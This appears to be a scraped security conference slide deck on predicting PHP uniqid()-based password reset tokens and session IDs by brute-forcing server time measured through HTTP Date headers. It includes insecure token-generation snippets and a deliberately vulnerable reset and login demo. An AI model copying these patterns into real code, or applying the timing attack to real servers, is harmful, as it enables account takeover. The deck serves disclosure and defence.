Telling The Time chris.anley@nccgroup.trust The Bug Server - - PowerPoint PPT Presentation

telling the time
SMART_READER_LITE
LIVE PREVIEW

Telling The Time chris.anley@nccgroup.trust The Bug Server - - PowerPoint PPT Presentation

Feb 21, 2023 229 likes •371 views

Telling The Time chris.anley@nccgroup.trust The Bug Server generates a time-based: -Password reset token -Session id -Random password -REST API Key ... For example: PHP uniqid() Gets a prefixed unique identifier based on the current

slide-1
SLIDE 1

Telling The Time

chris.anley@nccgroup.trust

slide-2
SLIDE 2

The Bug

Server generates a time-based:

  • Password reset token
  • Session id
  • Random password
  • REST API Key

...

slide-3
SLIDE 3

For example: PHP

uniqid()

“Gets a prefixed unique identifier based on the current time in microseconds.” CAUTION NOT SECURE WARNING NOT UNIQUE (?!) blah blah SECURE blah UNIQUE blah ...

slide-4
SLIDE 4

Check Github

$token = uniqid(); // 57eb8c5bbf47b; time $token = md5(uniqid()); // 41eced92fef729c756... time $pwd = substr(md5(uniqid()),0,8);// 41eced92; time srand((double) microtime() * 1000000); $token = md5(uniqid(rand())); // time,time $password = md5(uniqid($session, true));//time,known,time $password = md5(uniqid(time(), true));// time,time,time

slide-5
SLIDE 5

Let’s Take a Moment

A microsecond is a *really* short period of time “Lightning fast” - a lightning flash takes ~200,000 microseconds. “In the blink of an eye” ~100,000 microseconds “In a flash” ~1000 microseconds British Army L115A3 rifle muzzle velocity: 938 m/s = ~1mm per 1 µs

slide-6
SLIDE 6

The Target - Reset

<?php // resetPwd.php date_default_timezone_set("GMT"); ... $pwd = uniqid(); file_put_contents('/tmp/pwd', $pwd ); ...

slide-7
SLIDE 7

The Target - Login

<?php // login.php $pwd = $_GET['password']; $target = file_get_contents('/tmp/pwd'); if( strcmp( $pwd, $target ) == 0 ) { print("Access Granted<br>"); print("target: $target\\n<BR>"); print(phpinfo()); }

slide-8
SLIDE 8

Methodology

Could use - ntp, icmp timestamp, snmp, web app... RFC 2616: Origin servers MUST include a Date header field in all responses except: 100,101,500,503

  • r no clock.

If no clock, MUST NOT use expires or last-modified (ie. uncacheable). But date has a resolution of 1,000,000 µs... (!)

slide-9
SLIDE 9

Known Unknowns

Find a script with similar timing to the password reset script. Request this many times to find the clock diff. Date resolution is 1,000,000 µs, but there's an edge. Correct for distance from the edge. Apply this difference. Brute force (0, 1, -1, 2, -2, 3, -3...)

slide-10
SLIDE 10

Req Duration - Metropolitan

30 60 90 120 150 180

Microsecond Req Duration - Leatherhead to Telecity (SOV), Docklands (~30km) 200 µsec resolution.

17900 20100 22300 24500 26700 28900 31100 33300 35500

Frequency

slide-11
SLIDE 11

Results - Metropolitan

3 6 9 12 15 18

Microsecond Error in Brute Force - Leatherhead to Telecity (SOV), Docklands (~30km) 200 µsec resolution.

  • 13200
  • 11000
  • 8800
  • 6600
  • 4400
  • 2200

2200 Frequency

slide-12
SLIDE 12

Results - Antipodes

2 4 6 8 10 12

Microsecond Error in Brute Force - Leatherhead to Sydney (ec2), ~17000km, 2000 µsec resolution.

  • 157000
  • 141000
  • 125000
  • 109000
  • 93000
  • 77000
  • 61000
  • 45000
  • 29000
  • 13000

3000

Frequency

slide-13
SLIDE 13

But what does it mean?

We can brute force the µs time at which a web script will generate a token in: LAN: ~500 requests Metropolitan Area: ~1000 requests (~30 seconds) Antipodes, tiny server: ~40,000 requests (~1 hour) ...without trying very hard...

slide-14
SLIDE 14

Questions?

Improvements:

  • Frequency buckets.
  • Faster client environment.
  • Reliability testing; use a better network.

We haven’t talked about:

  • Local brute force.
  • Millisecond brute force.
  • Remote timing attacks in the literature.
  • All the many situations in which this is useful...